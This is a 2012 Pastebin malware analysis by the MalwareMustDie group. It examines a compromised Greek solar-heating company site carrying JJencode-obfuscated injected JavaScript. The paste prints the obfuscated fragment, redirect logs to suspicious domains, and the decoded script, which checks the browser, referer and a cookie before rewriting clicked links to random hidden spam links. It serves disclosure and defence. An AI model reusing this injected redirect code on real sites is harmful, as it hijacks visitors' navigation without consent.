API tools faq
paste
MalwareMustDie

(Updated)The suspected JS/Agent/Downloader Trojan #MMD

MalwareMustDie
Oct 26th, 2012
1,505
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.31 KB | None | 0 0
raw download clone embed print report
  1. ===============================================
  2. The suspected JS/Agent/Downloader Trojan
  3. #MalwareMustDie | @unixfreaxjp | Sat Oct 27 02:06:28 JST 2012
  4. Update: Sat Oct 27 14:19:55 JST 2012 (Decoded JJencode)
  5. ===============================================
  6.  
  7. // checking a hint...
  8.  
  9. $ myfetch h00p://www.iliosak.gr/index.php
  10. --proxy=1
  11. --user-agent="Mozila/4.3(X11; U; MacOSX)"
  12. --referer="h00p://www.google.com/search?q=gmail"
  13. --target="h00p://www.iliosak.gr/index.php"
  14.  
  15. --01:17:44-- h00p://www.iliosak.gr/index.php
  16. => `index.php'
  17. Connecting to 192.168.7.11:8118... connected.
  18. Proxy request sent, awaiting response... 200 OK
  19. Length: unspecified [text/html]
  20. 01:17:48 (19.24 KB/s) - `index.php' saved [51627]
  21.  
  22. // peek inside...
  23.  
  24. $ head index.php
  25.  
  26. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h00p://www.w3.or
  27. g/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  28.  
  29. <html xmlns="h00p://www.w3.org/1999/xhtml" xml:lang="el-gr" lang="el-gr"
  30. dir="ltr" >
  31.  
  32. <head>
  33. <SCRIPT type="text/javascript"> <!--
  34. $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$
  35. :({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$
  36. :++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=
  37. $+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$.
  38. _$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])
  39. +$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_ :
  40.  
  41. // ↑ nice! :-)
  42. // 1. he tried to hide the script tag...
  43. // 2. JJencode which too obviously too suspicious to ignore..
  44. // 3. what is the purpose behind this?
  45.  
  46.  
  47. // A greek language site...ok.
  48.  
  49. <meta name="keywords" content="Ηλιακοί
  50. θερμοσίφωνες,ηλιακός θερμοσίφωνας,Ηλιακά συστήματα,ηλιακοί,φωτοβολταϊκά,κλιματισμός,θέρμανση,Μεσσηνία" />
  51. <meta name="description" content="Εργοστάσιο κατασκευής ηλιακών συστημάτων και εφαρμογών φωτοβολταϊκών θέρμανσης &amp; κλιματισμού στη Μεσσηνία από το 1977.
  52.  
  53. //Obfuscation Javascript is under analysis....
  54.  
  55.  
  56. // OTHERS are....
  57.  
  58. //requestsing
  59.  
  60. h00p://www.iliosak.gr/templates/yoo_switch/lib/js/mootools.js.php .......CLEAN
  61. h00p://www.iliosak.gr/media/system/js/caption.js .......CLEAN
  62. h00p://www.iliosak.gr/templates/yoo_switch/lib/js/template.js.php .......CLEAN
  63. h00p://www.iliosak.gr/modules/mod_virtuemart/vm_transmenu/transmenu.js .......CLEAN
  64.  
  65.  
  66. // redirecting..
  67.  
  68. h00p://crotopole.eu/a41bb3d1c7 ⇒ h00p://www.cam4cam.fr/
  69. --01:40:46-- h00p://crotopole.eu/a41bb3d1c7
  70. => `a41bb3d1c7'
  71. Resolving crotopole.eu... 88.191.151.166
  72. Connecting to crotopole.eu|88.191.151.166|:80... connected.
  73. h00p request sent, awaiting response... 301 Moved Permanently
  74. Location: h00p://www.cam4cam.fr/ [following]
  75. --01:40:46-- h00p://www.cam4cam.fr/
  76. => `index.html'
  77. Resolving www.cam4cam.fr... 88.191.151.166
  78. Reusing existing connection to crotopole.eu:80.
  79. h00p request sent, awaiting response... 200 OK
  80. Length: 5,961 (5.8K) [text/html]
  81.  
  82. // a wordpress↓ ............CLEAN one.....
  83.  
  84. #Penguinzophren, Sentimancho | Cam4 cam | Chatroulette & Chat webcam
  85. #Penguinzophren Vs Sentimancho RSS Feed
  86.  
  87. Penguinzophren Vs Sentimancho
  88. * Penguinzophren Vs Sentimancho
  89. *
  90. * Non classé
  91.  
  92. Matt Cutts Vs Black Hat
  93.  
  94. Sentimancho Vs Penguinzophren
  95. Non classé | riko | Comments (0) |
  96. Le but du concours est de : Niker MC et GG (pour les intimes) Tu l'auras compris mon titre veut tout dire, Matt cutts
  97. je veux ta peau! Celle du Penguinzophren ainsi que celle du Sentimancho . Matt Cutts le pingouin en slip Penguinzophren
  98. et Sentimancho pour moi et tous les referenceurs qui participent de près où de lien à cette grande cage aux folles
  99.  
  100.  
  101. // and a download....
  102.  
  103. h00p://www.cres.gr/energy-saving/SCRIPT_2.htm...... clean!...
  104.  
  105. // It is up to the javascript decoding result...
  106. // Handover to the two genious in our crackteam Thanks guys!
  107. //The JJEncode turns up to be ↓ which checks your referer, set/checks the Cookie, checks the browser version for access (significant check for Chrome..), is a short of ACL for visitor accessing the page..
  108.  
  109. ((function $anonymous$(){return" page_links = [];
  110. function setGlobalOnLoad(f) {
  111. var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null
  112. if (root){
  113. if(root.addEventListener) root.addEventListener(\"load\", f, false)
  114. else if(root.attachEvent) root.attachEvent(\"onload\", f)
  115. } else {
  116. if(typeof window.onload == 'function') {
  117. var existing = window.onload
  118. window.onload = function() {
  119. existing()
  120. f()
  121. }
  122. } else {
  123. window.onload = f
  124. }
  125. }
  126. }
  127. function addHandler(object, event, handler) {
  128. if (typeof object.addEventListener != 'undefined')
  129. object.addEventListener(event, handler, false);
  130. else if (typeof object.attachEvent != 'undefined')
  131. object.attachEvent('on' + event, handler);
  132. }
  133.  
  134. if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {
  135. var right_browser='yes';
  136. }else var right_browser='no';
  137.  
  138. function getCookie(c_name)
  139. {
  140. if (document.cookie.lengthj)
  141. {
  142. c_start=document.cookie.indexOf(c_name + \"=\");
  143. if (c_start!=-1)
  144. {
  145. c_start=c_start + c_name.length+1;
  146. c_end=document.cookie.indexOf(\";\",c_start);
  147. if (c_end==-1) c_end=document.cookie.length;
  148. return unescape(document.cookie.substring(c_start,c_end));
  149. }
  150. }
  151. return \"\";
  152. }
  153. var c_index = Math.floor(Math.random() * 5);
  154. var fcoo=getCookie('c_first');
  155. var exdate=new Date();
  156. exdate.setDate(exdate.getDate()+365);
  157. document.cookie='c_first'+ \"=\" +escape('false')+\";expires=\"+exdate.toUTCString();
  158. if (c_index=O && fcoo!='false' && right_browser=='yes') {
  159. setGlobalOnLoad(function() {
  160. var block = document.getElementById('mlk');
  161. var links = block.getElementsByTagName('A');
  162. for (var i = 0; i < links.length; i++) {
  163. page_links.push(links[i].href);
  164. }
  165. var links = document.links;
  166. for (var i = 0; i < links.length; i++) {
  167. addHandler(links[i], \"click\", function(event) {
  168. var index = Math.floor(Math.random() * (page_links.length - 1));
  169. event.target.href = page_links[index];
  170. });
  171. }
  172. });
  173.  
  174.  
  175. #MalwareMustDie!
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!